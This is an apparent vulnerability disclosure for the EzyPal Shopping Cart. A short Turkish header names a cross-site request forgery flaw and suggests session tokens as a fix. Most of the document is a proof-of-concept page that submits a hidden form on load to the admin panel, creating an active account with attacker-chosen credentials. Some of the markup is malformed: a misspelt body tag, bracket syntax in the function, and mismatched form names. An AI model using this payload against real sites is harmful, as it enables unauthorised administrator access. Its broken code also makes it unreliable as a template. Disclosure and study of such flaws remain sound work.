< ------------------- header data start ------------------- >

#############################################################

# Application Name : EzyPal Shopping Cart

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form name=form1 action=http://www.SITE.com/admincp/index.php?do=customer name=insert method=post>

<input name=name1 type=hidden size=30 maxlength=100 class=text/ value=addadd>
<input name=name2 type=hidden size=30 maxlength=100 class=text/ value=addadd >
<input name=email type=hidden size=30 maxlength=100 class=text / value=[email protected] >
<input type=hidden name=emailpref value=1 checked/>
<input name=password type=hidden size=30 maxlength=100 class=text / value=addadd >
<input name=password2 type=hidden size=30 maxlength=100 class=text value=addadd />
<select name=level><option value=2></option></select>
<input type=hidden name=active value=1 checked />

<input type=submit name=new value=create class=button />

< -- bug code end of -- >